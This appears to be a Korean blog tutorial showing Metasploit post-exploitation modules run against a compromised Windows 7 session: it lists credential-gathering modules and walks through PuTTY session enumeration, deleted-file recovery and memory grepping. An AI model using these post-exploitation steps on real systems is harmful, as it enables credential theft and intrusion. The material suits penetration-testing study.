Post module 찾기
HAHWUL exploit(easyfilesharing_post) > search type:post platform:windows
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
post/multi/gather/apple_ios_backup normal Windows Gather Apple iOS MobileSync Backup File Collection
post/multi/gather/check_malware normal Multi Gather Malware Verifier
post/multi/gather/dbvis_enum normal Multi Gather DbVisualizer Connections Settings
post/multi/gather/dns_bruteforce normal Multi Gather DNS Forward Lookup Bruteforce
post/multi/gather/dns_reverse_lookup normal Multi Gather DNS Reverse Lookup Scan
post/multi/gather/dns_srv_lookup normal Multi Gather DNS Service Record Lookup Scan
post/multi/gather/enum_vbox normal Multi Gather VirtualBox VM Enumeration
post/multi/gather/env normal Multi Gather Generic Operating System Environment Settings
post/multi/gather/filezilla_client_cred normal Multi Gather FileZilla FTP Client Credential Collection
post/multi/gather/find_vmx normal Multi Gather VMWare VM Identification
post/multi/gather/firefox_creds normal Multi Gather Firefox Signon Credential Collection
post/multi/gather/jboss_gather normal Jboss Credential Collector
post/multi/gather/lastpass_creds normal LastPass Vault Decryptor
post/multi/gather/multi_command normal Multi Gather Run Shell Command Resource File
post/multi/gather/pgpass_creds normal Multi Gather pgpass Credentials
post/multi/gather/pidgin_cred normal Multi Gather Pidgin Instant Messenger Credential Collection
post/multi/gather/ping_sweep normal Multi Gather Ping Sweep
post/multi/gather/resolve_hosts normal Multi Gather Resolve Hosts
post/multi/gather/run_console_rc_file normal Multi Gather Run Console Resource File
post/multi/gather/skype_enum normal Multi Gather Skype User Data Enumeration
post/multi/gather/thunderbird_creds
...snip...
putty sessions 찾기
post/windows/gather/enum_putty_saved_sessionsHAHWUL exploit(easyfilesharing_post) > use post/windows/gather/enum_putty_saved_sessions
HAHWUL post(enum_putty_saved_sessions) > show options
Module options (post/windows/gather/enum_putty_saved_sessions):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
HAHWUL post(enum_putty_saved_sessions) > run
[-] Post failed: Msf::OptionValidateError The following options failed to validate: SESSION.
HAHWUL post(enum_putty_saved_sessions) > set SESSION 2
SESSION => 2
HAHWUL post(enum_putty_saved_sessions) > run
[*] Looking for saved PuTTY sessions
[-] No saved sessions found
[*] Looking for previously stored SSH host key fingerprints
[-] No stored SSH host keys found
[*] Looking for Pageant...
[+] Pageant is running (Handle 0x0)
[*] Post module execution completed
post/windows/gather/forensics/browser_history normal Windows Gather Skype, Firefox, and Chrome Artifacts
post/windows/gather/forensics/duqu_check normal Windows Gather Forensics Duqu Registry Check
post/windows/gather/forensics/enum_drives normal Windows Gather Physical Drives and Logical Volumes
post/windows/gather/forensics/imager normal Windows Gather Forensic Imaging
post/windows/gather/forensics/nbd_server normal Windows Gather Local NBD Server
post/windows/gather/forensics/recovery_files normal Windows Gather Deleted Files Enumeration and Recovering
파일 복구 관련 Module
HAHWUL post(driver_loader) > use post/windows/gather/forensics/recovery_files
HAHWUL post(recovery_files) > show options
Module options (post/windows/gather/forensics/recovery_files):
Name Current Setting Required Description
---- --------------- -------- -----------
DRIVE C: yes Drive you want to recover files from.
FILES no ID or extensions of the files to recover in a comma separated way. Let empty to enumerate deleted files.
SESSION yes The session to run this module on.
TIMEOUT 3600 yes Search timeout. If 0 the module will go through the entire $MFT.
HAHWUL post(recovery_files) > set SESSION 2
SESSION => 2
HAHWUL post(recovery_files) > run
[*] System Info - OS: Windows 7 (Build 7601, Service Pack 1)., Drive: C:
[*] $MFT is made up of 1 dataruns
[*] Searching deleted files in data run 1 ...
Memory grep
post/windows/gather/memory_grep
HAHWUL post(recovery_files) > use post/windows/gather/memory_grep
HAHWUL post(memory_grep) > show options
Module options (post/windows/gather/memory_grep):
Name Current Setting Required Description
---- --------------- -------- -----------
HEAP false no Grep from heap
PROCESS yes Name of the process to dump memory from
REGEX yes Regular expression to search for with in memory
SESSION yes The session to run this module on.
 |
HAHWULSecurity engineer, Gopher and H4cker!
 |
0 개의 댓글:
Post a Comment